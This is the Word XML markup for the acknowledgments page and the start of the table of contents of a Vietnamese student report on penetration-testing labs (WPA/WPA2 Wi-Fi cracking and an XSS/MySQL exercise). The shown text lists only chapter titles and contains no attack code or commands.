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0821" w14:textId="77777777" w:rsidR="00FF1EBB" w:rsidRPr="00F12C2B" w:rsidRDefault="000106DB" w:rsidP="00070DCA">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:sz w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:t>L</w:t>
      </w:r>
      <w:r w:rsidR="00FF1EBB" w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">ỜI </w:t>
      </w:r>
      <w:r w:rsidR="00442AA1" w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:t>CẢM ƠN</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EB29BB2" w14:textId="77777777" w:rsidR="00FF1EBB" w:rsidRPr="00F12C2B" w:rsidRDefault="00FF1EBB" w:rsidP="00AC2F30">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="250C0755" w14:textId="77777777" w:rsidR="00FA1AD3" w:rsidRPr="00F12C2B" w:rsidRDefault="00FA1AD3" w:rsidP="00AC2F30">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:spacing w:after="150" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:i/>
          <w:color w:val="484646"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F12C2B">
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:i/>
          <w:color w:val="484646"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t xml:space="preserve">Để hoàn thành nhiệm vụ được giao, ngoài sự nỗ lực học hỏi của bản thân còn có sự hướng dẫn tận tình của </w:t>
      </w:r>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:i/>
          <w:color w:val="484646"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>giảng viên</w:t>
      </w:r>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:i/>
          <w:color w:val="484646"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t>, bạn bè , anh chị của những năm trước.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59821188" w14:textId="77777777" w:rsidR="00FA1AD3" w:rsidRPr="00F12C2B" w:rsidRDefault="00FA1AD3" w:rsidP="00AC2F30">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:spacing w:after="150" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:i/>
          <w:color w:val="484646"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:i/>
          <w:color w:val="484646"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t xml:space="preserve">Em chân thành cảm ơn </w:t>
      </w:r>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:i/>
          <w:color w:val="484646"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>giảng viên</w:t>
      </w:r>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:i/>
          <w:color w:val="484646"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t xml:space="preserve"> – ThS.</w:t>
      </w:r>
      <w:r w:rsidR="009E6AD1" w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:i/>
          <w:color w:val="484646"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>Nguyễn Anh Vũ</w:t>
      </w:r>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:i/>
          <w:color w:val="484646"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t>, người đã hướng dẫn tận tình cho em trong suốt thời gian học tập.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DE77D73" w14:textId="77777777" w:rsidR="00FA1AD3" w:rsidRPr="00F12C2B" w:rsidRDefault="00FA1AD3" w:rsidP="00AC2F30">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:spacing w:after="150" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:i/>
          <w:color w:val="484646"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:i/>
          <w:color w:val="484646"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t>Xin cảm ơn tất cả các bạn bè, thư viện đã giúp đỡ, dìu dắt em trong suốt thời gian qua. Tất cả các mọi người đều nhiệt tình giúp đỡ</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64C485F5" w14:textId="77777777" w:rsidR="00FA1AD3" w:rsidRPr="00F12C2B" w:rsidRDefault="00FA1AD3" w:rsidP="00AC2F30">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:spacing w:after="150" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:i/>
          <w:color w:val="484646"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:i/>
          <w:color w:val="484646"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t>Tuy nhiên vì kiến thức chuyên môn còn hạn chế và bản thân còn thiếu nhiều kinh nghiệm thực tiễn nên nội dung của báo cáo không tránh khỏi những thiếu xót, em rất mong nhận sự góp ý, chỉ bảo thêm của quý thầy cô.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6253F878" w14:textId="77777777" w:rsidR="00FF1EBB" w:rsidRPr="00F12C2B" w:rsidRDefault="00FA1AD3" w:rsidP="00AC2F30">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1080"/>
        </w:tabs>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="484646"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t xml:space="preserve">Một lần nữa xin gửi đến </w:t>
      </w:r>
      <w:r w:rsidR="00074F57" w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="484646"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>giảng viên</w:t>
      </w:r>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="484646"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t>, bạn bè , anh chị tại Trường (HUFLIT) lời cảm ơn chân thành và tốt đẹp nhất</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A700615" w14:textId="77777777" w:rsidR="00FF1EBB" w:rsidRPr="00F12C2B" w:rsidRDefault="00FF1EBB" w:rsidP="00AC2F30">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="3765"/>
        </w:tabs>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="46A64273" w14:textId="77777777" w:rsidR="00FF1EBB" w:rsidRPr="00F12C2B" w:rsidRDefault="00FF1EBB" w:rsidP="00AC2F30">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="3765"/>
        </w:tabs>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>TP. Hồ Chí Minh</w:t>
      </w:r>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>, ngày</w:t>
      </w:r>
      <w:r w:rsidR="00660CFE" w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> 1</w:t>
      </w:r>
      <w:r w:rsidR="0070679E" w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>5</w:t>
      </w:r>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> tháng </w:t>
      </w:r>
      <w:r w:rsidR="00660CFE" w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>7</w:t>
      </w:r>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> năm 20</w:t>
      </w:r>
      <w:r w:rsidR="00660CFE" w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>20</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7350020D" w14:textId="77777777" w:rsidR="00FF1EBB" w:rsidRPr="00F12C2B" w:rsidRDefault="00FF1EBB" w:rsidP="00AC2F30">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="3765"/>
        </w:tabs>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>Tác giả</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="405197CB" w14:textId="77777777" w:rsidR="003D4BF0" w:rsidRPr="00F12C2B" w:rsidRDefault="003D4BF0" w:rsidP="00AC2F30">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="center" w:pos="5670"/>
        </w:tabs>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Calibri" w:hAnsi="Times New Roman"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="153924DC" w14:textId="77777777" w:rsidR="00BB1CB4" w:rsidRPr="00F12C2B" w:rsidRDefault="00BB1CB4" w:rsidP="00AC2F30">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:sz w:val="20"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4C47C4CB" w14:textId="77777777" w:rsidR="00AC2A7A" w:rsidRPr="00F12C2B" w:rsidRDefault="00AC2A7A" w:rsidP="00AC2F30">
      <w:pPr>
        <w:pStyle w:val="Header"/>
        <w:tabs>
          <w:tab w:val="clear" w:pos="4320"/>
          <w:tab w:val="clear" w:pos="8640"/>
          <w:tab w:val="right" w:leader="dot" w:pos="9072"/>
          <w:tab w:val="right" w:leader="dot" w:pos="9526"/>
        </w:tabs>
        <w:spacing w:before="120" w:after="120" w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="78557469" w14:textId="77777777" w:rsidR="00AC2A7A" w:rsidRPr="00F12C2B" w:rsidRDefault="003D34A1" w:rsidP="00AC2F30">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="00F12C2B">
        <w:br w:type="page"/>
      </w:r>
      <w:r w:rsidR="00AC2A7A" w:rsidRPr="00F12C2B">
        <w:lastRenderedPageBreak/>
        <w:t>MỤC LỤC</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="015FEA17" w14:textId="4788504B" w:rsidR="00AC2A7A" w:rsidRDefault="00AC2A7A" w:rsidP="00AC2F30">
      <w:pPr>
        <w:pStyle w:val="TOC1"/>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:color w:val="auto"/>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> TOC \o "1-5" \h \z \u </w:instrText>
      </w:r>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:hyperlink r:id="rId8" w:anchor="_Toc357225330" w:history="1">
        <w:r w:rsidR="0067784F" w:rsidRPr="00F12C2B">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:color w:val="auto"/>
            <w:u w:val="none"/>
          </w:rPr>
          <w:t>CHƯƠNG</w:t>
        </w:r>
        <w:r w:rsidR="0046776D" w:rsidRPr="00F12C2B">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:color w:val="auto"/>
            <w:u w:val="none"/>
          </w:rPr>
          <w:t xml:space="preserve"> I</w:t>
        </w:r>
        <w:r w:rsidRPr="00F12C2B">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:color w:val="auto"/>
            <w:u w:val="none"/>
          </w:rPr>
          <w:t>:</w:t>
        </w:r>
        <w:r w:rsidR="00E220CD">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:color w:val="auto"/>
            <w:u w:val="none"/>
          </w:rPr>
          <w:t xml:space="preserve"> HƯỚNG DẪN CÀI ĐẶT</w:t>
        </w:r>
        <w:r w:rsidRPr="00F12C2B">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:webHidden/>
            <w:color w:val="auto"/>
            <w:u w:val="none"/>
          </w:rPr>
          <w:tab/>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00A569C2">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:color w:val="auto"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04299DA9" w14:textId="5EAB8136" w:rsidR="00E220CD" w:rsidRPr="00E220CD" w:rsidRDefault="00E220CD" w:rsidP="00E220CD">
      <w:pPr>
        <w:pStyle w:val="TOC1"/>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:color w:val="auto"/>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E220CD">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:color w:val="auto"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t>CHƯƠNG II: THỰC HIỆN CÁC BÀI LAB PENTESTER</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:color w:val="auto"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00A569C2">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:color w:val="auto"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t>16</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57A43744" w14:textId="5F8FF91F" w:rsidR="00AC2A7A" w:rsidRPr="00F12C2B" w:rsidRDefault="00AC2A7A" w:rsidP="00AC2F30">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9090"/>
        </w:tabs>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t>1.</w:t>
      </w:r>
      <w:r w:rsidR="00915041" w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="0067784F" w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>LAB 1:</w:t>
      </w:r>
      <w:r w:rsidR="00A569C2" w:rsidRPr="00A569C2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00A569C2" w:rsidRPr="00A569C2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Hack password wifi WPA/WPA2</w:t>
      </w:r>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:webHidden/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="000F2470">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:webHidden/>
        </w:rPr>
        <w:t>16</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51E90D69" w14:textId="0E5A594C" w:rsidR="00FF2825" w:rsidRPr="00F12C2B" w:rsidRDefault="00FF2825"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1.1</w:t>
      </w:r>
      <w:r w:rsidR="00A569C2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>. Giới thiệu</w:t>
      </w:r>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="000F2470">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>16</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74B4550D" w14:textId="23127D1A" w:rsidR="00915041" w:rsidRPr="00F12C2B" w:rsidRDefault="00915041"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1.2</w:t>
      </w:r>
      <w:r w:rsidR="00A569C2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00A569C2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>Khai thác</w:t>
      </w:r>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="000F2470">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>16</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="452FC0BE" w14:textId="53EB1EE6" w:rsidR="00915041" w:rsidRPr="00F12C2B" w:rsidRDefault="00915041" w:rsidP="00AC2F30">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9090"/>
        </w:tabs>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">2. </w:t>
      </w:r>
      <w:r w:rsidR="0067784F" w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>LAB 2:</w:t>
      </w:r>
      <w:r w:rsidR="00A569C2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00A569C2" w:rsidRPr="00A569C2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>XXS and MySQL FILE</w:t>
      </w:r>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="000F2470">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>23</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54021DF3" w14:textId="247B11CC" w:rsidR="00915041" w:rsidRPr="00F12C2B" w:rsidRDefault="00915041"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2.</w:t>
      </w:r>
      <w:r w:rsidR="00A569C2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>1. Giới thiệu</w:t>
      </w:r>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="000F2470">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>23</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7043E6D0" w14:textId="0FA8B12C" w:rsidR="00915041" w:rsidRPr="00F12C2B" w:rsidRDefault="00915041"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2.2</w:t>
      </w:r>
      <w:r w:rsidR="00A569C2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00A569C2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>Khai thác</w:t>
      </w:r>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
